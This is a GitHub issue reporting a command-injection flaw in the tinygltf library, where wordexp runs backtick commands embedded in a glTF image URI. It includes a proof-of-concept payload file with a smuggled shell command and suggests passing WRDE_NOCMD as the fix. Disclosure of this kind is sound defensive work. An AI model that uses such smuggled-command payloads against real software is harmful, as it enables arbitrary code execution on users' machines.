-
-
Notifications
You must be signed in to change notification settings - Fork 462
Closed
Labels
Description
Describe the issue
This is a security vulnerability. The wordexp
call here allows arbitrary code execution
Line 2640 in 0fa56e2
int ret = wordexp(quoted_path.c_str(), &p, 0); |
To Reproduce
- OS: Linux
- Compiler, compiler version, compile options: Clang 13.0.1-6
$ git clone https://github.com/syoyo/tinygltf
$ cd tinygltf && make all
$ echo '{"images":[{"uri":"a`echo iamhere > poc`"}], "asset":{"version":""}}' > payload.gltf
$ ./loader_example payload.gltf
$ cat poc
iamhere
Expected behaviour
The echo iamhere > poc
command should not be executed and the poc
file is not created in the CWD.
Additional context
This was found by OSS-Fuzz: https://bugs.chromium.org/p/oss-fuzz/issues/detail?id=49053
One potential fix here is to pass WRDE_NOCMD
to wordexp
per https://man7.org/linux/man-pages/man3/wordexp.3.html